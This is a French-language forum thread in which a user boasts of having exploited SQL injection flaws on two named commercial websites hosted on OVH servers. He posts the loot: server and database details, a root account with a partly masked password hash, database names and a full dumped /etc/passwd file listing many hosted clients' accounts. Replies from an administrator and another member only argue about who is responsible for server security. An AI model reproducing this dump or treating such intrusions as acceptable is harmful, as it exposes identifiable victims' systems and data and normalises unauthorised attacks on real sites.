Aller au contenu
Règlement du forum ×
IPTV et arnaques ×

La Preuve que les Serveur de OVH ne sont pas aussi Sécurisé

ColdFire

Par ColdFire
dans Sécurité Informatique

 Share

Messages recommandés

ColdFire Newbie

ColdFire

Posté(e)
Posté(e) (modifié)

Bonjours voila y'a quelque temps j'ai entendu par quelque Étudiant dans la fac que si on achète un serveur chez

OVH Un grand Hébergeur Français :lol:meme si y'a une faille de type SQL sur ton site en peut l'exploité vue que

OVH dispose de system de Audit ps: des systèmes de surveillance oui c'est vrai

mais bon je me suis dis je vais testé "balek tezharli" je peut au moins avoir la base de données qui relier avec l'interface du site

Voila après quelque recherche sa ma étonnées de voir le prix des serveurs Dédier et leur niveau de sécurité lol

voila le premier test:

http://www.tornier.com Voila le site en question qui est héberger sur un serveur Dédier chez OVH

Informations:http://whois.domaintools.com/91.121.73.46

âpres exploit :


Host IP:              91.121.181.95
Web Server:        Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
Powered-by:        PHP/4.4.8_pre20070816-pl1-gentoo
DB Server:           MySQL error based
Current User:       root@localhost
Sql Version:         5.0.44-log
Current DB:         tornier_*****
System User:       root@localhost
Host Name:         ns363656.ovh.net
Installation dir:    /
DB User & Pass:     
                       root:*5F1D1812*****************F834E47BC5E:localhost
Data Bases:
       mysql
       test
       tornier_australia
       tornier_denmark
       tornier_denmark_backup
       tornier_espania
       tornier_germany
       tornier_italia
       tornier_japan
       tornier_netherlands
       tornier_switzerland

Voila le 2em Exemple :

le site:http://www.bagster.com

Informations:http://whois.domaintools.com/87.98.139.244

âpres exploit :


Host IP:               87.98.139.244
Web Server:         Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8o
Powered-by:         PHP/5.2.13-pl1-gentoo
Current User:        bagster@localhost
Sql Version:          5.0.44
Current DB:          bagster2007
System User:        bagster@localhost
Host Name:          ns211902.ovh.net
Installation dir:     /
DB User:              'bagster'@'%'
Data Bases:
bagster
bagster2
bagster2004
bagster2007
bagsterbourse
bagsterlog
bagsterphpdig

+ un Bonus

Code:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/share/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/bin/false
rpc:x:111:111:added by portage for portmap:/dev/null:/usr/sbin/nologin
------------------------------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/share/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/bin/false
rpc:x:111:111:added by portage for portmap:/dev/null:/usr/sbin/nologin
ovh:x:500:500::/home/ovh:/bin/false
mysql:x:60:60:added by portage for mysql:/dev/null:/usr/sbin/nologin
named:x:40:40:added by portage for bind:/etc/bind:/usr/sbin/nologin
clamav:x:101:501:added by portage for clamav:/dev/null:/usr/sbin/nologin
alias:x:501:200:added by portage for qmail-ovh:/var/qmail/alias:/bin/bash
qmaild:x:502:200:added by portage for qmail-ovh:/var/qmail:/bin/bash
qmaill:x:503:200:added by portage for qmail-ovh:/var/qmail:/bin/bash
qmailp:x:504:200:added by portage for qmail-ovh:/var/qmail:/bin/bash
qmailq:x:505:502:added by portage for qmail-ovh:/var/qmail:/bin/bash
qmailr:x:506:502:added by portage for qmail-ovh:/var/qmail:/bin/bash
qmails:x:507:502:added by portage for qmail-ovh:/var/qmail:/bin/bash
vpopmail:x:508:503:added by portage for qmail-ovh:/home/vpopmail:/bin/bash
qscand:x:509:504:added by portage for qmail-ovh:/var/spool/qmailscan:/usr/sbin/nologin
cron:x:16:16:added by portage for cronbase:/var/spool/cron:/usr/sbin/nologin
ftp:x:21:21:added by portage for ftpbase:/home/ftp:/usr/sbin/nologin
ldap:x:439:439:added by portage for openldap:/usr/lib64/openldap:/usr/sbin/nologin
tcpdump:x:102:506:added by portage for tcpdump:/dev/null:/usr/sbin/nologin
proftpd:x:103:507:added by portage for proftpd:/dev/null:/sbin/nologin
sfim:x:1000:100::/home/www/sfim:/bin/bash
actimanu3:x:1001:100::/home/www/actimanu3/:/bin/bash
adlc:x:1002:100::/home/www/adlc/:/bin/bash
encyclodocs:x:1003:100::/home/www/encyclodocs/:/bin/bash
altajurisalencon:x:1004:100::/home/www/altajurisalencon/:/bin/bash
altajurisargentan:x:1005:100::/home/www/altajurisargentan/:/bin/bash
altajurisavranches:x:1006:100::/home/www/altajurisavranches/:/bin/bash
altajuriscaen:x:1007:100::/home/www/altajuriscaen/:/bin/bash
altajurischerbourg:x:1008:100::/home/www/altajurischerbourg/:/bin/bash
altajurisdieppe:x:1009:100::/home/www/altajurisdieppe/:/bin/bash
altajurisevreux:x:1010:100::/home/www/altajurisevreux/:/bin/bash
altajurislehavre:x:1011:100::/home/www/altajurislehavre/:/bin/bash
altajurislisieux:x:1012:100::/home/www/altajurislisieux/:/bin/bash
altajurisnormandie:x:1013:100::/home/www/altajurisnormandie/:/bin/bash
altajurisrouen:x:1014:100::/home/www/altajurisrouen/:/bin/bash
aocisigny:x:1015:100::/home/www/aocisigny/:/bin/bash
aselie:x:1016:100::/home/www/aselie/:/bin/bash
aseo:x:1017:100::/home/www/aseo/:/bin/bash
atdynet:x:1018:100::/home/www/atdynet/:/bin/bash
deauville:x:1019:100::/home/www/deauville/:/bin/bash
benoist:x:1020:100::/home/www/benoist/:/bin/bash
blh:x:1021:100::/home/www/blh/:/bin/bash
bullster:x:1022:100::/home/www/bullster/:/bin/bash
cgtcheminots:x:1023:100::/home/www/cgtcheminots/:/bin/bash
ddjsorne:x:1024:100::/home/www/ddjsorne/:/bin/bash
debeauvais:x:1025:100::/home/www/debeauvais/:/bin/bash
drjs:x:1026:100::/home/www/drjs/:/bin/bash
ecreps:x:1027:100::/home/www/ecreps/:/bin/bash
hiszfamily:x:1028:100::/home/www/hiszfamily/:/bin/bash
ilp:x:1029:100::/home/www/ilp/:/bin/bash
parcfelins:x:1030:100::/home/www/parcfelins/:/bin/bash
pdc:x:1031:100::/home/www/pdc/:/bin/bash
qualiconcept:x:1032:100::/home/www/qualiconcept/:/bin/bash
relaisdesc:x:1033:100::/home/www/relaisdesc/:/bin/bash
scenar:x:1034:100::/home/www/scenar/:/bin/bash
segura:x:1035:100::/home/www/segura/:/bin/bash
sergedanais:x:1036:100::/home/www/sergedanais/:/bin/bash
toutcaen:x:1037:100::/home/www/toutcaen/:/bin/bash
neeko:x:1038:100::/home/www/neeko/:/bin/bash
archives:x:1039:100::/home/www/archives/:/bin/bash
tag:x:1040:10::/home/tag/:/bin/bash
telfrance:x:1041:100::/home/www/telfrance/:/bin/bash
atdynettodo:x:1042:100::/home/www/atdynettodo/:/bin/bash
otbocage:x:1043:100::/home/www/otbocage/:/bin/bash
blhexport:x:1044:100::/home/www/blh/export/:/bin/bash
secdem:x:1045:100::/home/www/secdem/:/bin/bash
intercom:x:1046:100::/home/www/intercom/:/bin/bash
kameleon:x:1047:100::/home/www/kameleon/:/bin/bash
snip:x:1048:100::/home/www/snip/:/bin/bash
keragan:x:1049:100::/home/www/keragan/:/bin/bash
berith:x:1050:100::/home/www/berith:/bin/bash
pain2folie:x:1051:21::/home/paindefolie:/bin/bash
dhcp:x:104:508:added by portage for dhcp:/var/lib/dhcp:/sbin/nologin
wwf:x:1052:100::/home/www/wwf/:/bin/bash
bagster2004:x:1053:100::/home/www/bagster2004:/bin/bash
stherese:x:1054:100::/home/www/stherese/:/bin/bash

Donc on peut pas dire que tout les serveurs OVH sont sécurisé que sa xD

avoir juste la db relier avec le site c'est une chose mais avoir le tout juste avec une faille de Type Injection SQL c'est sympa sur tout sur un hoteur comme OVH

Modifié par ColdFire
Lien vers le commentaire
Partager sur d’autres sites
  • Administrateurs
Lyès Experienced

Lyès

Posté(e)
  • Administrateurs
Posté(e)

Bonsoir,

 

De quoi tu parle mon ami ?

 

OVH livre le serveur mais n'assure en aucun cas la sécurité logiciel.. ni sa gestion ;) c'est au client de tout installer et de protéger son serveur avec un firewall et une configuration sécurisé.

 

++

  • Like 4
Lien vers le commentaire
Partager sur d’autres sites
  • 1 month later...
snooppy Newbie

snooppy

Posté(e)
Posté(e)
mais c'est bizarre que OVH ne mé pas de système de sécurité automatiser sur les dédies O_o

Ok donc il vont placer derrière chaque serveur un pare feu Physique ? allez on calcule vite fait , ...Humm

 

70 000 Serveurs ( avec le data du Quebec il passe à 250 000 ) Donc 70 000 x 250 ( le prix d'un petit Cisco 5000) sans comptez l'installation ....

 

Outch sa fait mal , mais c'est rien par rapport au 35 Million euro que Ovh engrange ...Mais attention il faut que utilisateur à chaque fois qu'il veut installez un Mysql ou php ou même un serveur de jeux , il doit ouvrir les port sur le Firewal Cisco ...

 

Donc faire ceci avec les 70 k Serveurs ?

 

je pense pas que Octave est envie de ce faire chier ......Avec Ovh , c'est du pas chère mais débrouiller vous ! les autres on fait pareil pour info

Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

×
 Share
Aller sur la liste des sujets

  • Messages

    • Lyès
      Le droit de change pour voyage, ce que vous devez savoir!

      Par Lyès · Posté(e)

      Je ne suis absolument pas contre des garde-fous, le soucis c'est les décisions qui n'ont ni tête ni queue comme celle interdisant aux citoyens de pouvoir faire le change si ils voyagent moins d'une semaine, ça n'a aucun sens! ça veux dire que si un algérien décide de prendre 6 jours de vacances en Espagne, il n'ouvre pas droit au change ? Pareil pour la décision de faire appel au pénal pour une histoire de change de moins de 750 euros.. c'est RIDICULE. A croire que c'est une subvention.. c'est DU CHANGE, on échange de l'argent contre de l'argent. J'aime reconnaitre les choses quand elles sont bien faites, mais la c'est juste ridicule. Il faut vraiment régler cette histoire de devises une bonne fois pour toute.
    • laliche
      Le droit de change pour voyage, ce que vous devez savoir!

      Par laliche · Posté(e)

      Personne ne s'attendait à l'application de cette décision datant de plusieurs mois. Il fallait des garde-fous contre les risques de détournement ce qui explique la frilosité de sa mise en œuvre. De l'autre coté il y'a des pressions des partenaires internationaux dont l'UE qui en mettant l'Algérie dans la liste noire la pousse à prendre des mesures contre le marché parallèle de la devise afin de lutter contre le blanchiment.
    • genio
      Meilleur offre compte devises/carte visa en Algérie

      Par genio · Posté(e)

      @Sonkilary jai essayé tout...mais je n'arrive pas a linker redotpay avec paypal... que ce soit via APP ou via SMS je recois le message "nous n'avons pas pu confirmer identité" !!!! t'as entendu parler de cas pareils ?!    @yasi9898si tu as une idée je suis preneur..   javais lu il y a 2 semaines que paypal DZ n'acceptent plus les cartes etrangeres. un mec avait recu cette reponse de PP eux meme. il faut une carte DZ par une banque DZ....sachant que les banques DZ n'acceptent pas PP !!!!!!!!!!!!!
    • genio
      Paiement électronique : lancement officiel

      Par genio · Posté(e)

      NOUVEAUTE interessante ! evolution interessante et qui concerne des millions d'algeriens ! pour les voyageurs vers la TUNISIE entre autres...on peut desormais payer la taxte via le net !   La Direction générale des impôts (DGI) a annoncé, jeudi dans un communiqué, le lancement d’un nouveau service de paiement en ligne de la taxe sur les titres de transport, via sa plateforme numérique dédiée au paiement des droits de timbre, « Tabioucom ». Ce service s’adresse aux détenteurs de passeports souhaitant voyager par voie terrestre ou ferroviaire vers les pays frontaliers. Il leur permet de s’acquitter à distance de la taxe applicable aux titres de transport, en utilisant la carte interbancaire (CIB) ou la carte Edhahabia, précise la même source. La DGI indique que ce service est disponible 24h/24h et 7j/7j, et accessible via le le meme site que la vignette AUTO. https://tabioucom.mf.gov.dz.
    • Lyès
      Le droit de change pour voyage, ce que vous devez savoir!

      Par Lyès · Posté(e)

      Il faut toujours qu'ils trouvent un moyen de compliquer des choses simples.. c'est fou.
×
×
  • Créer...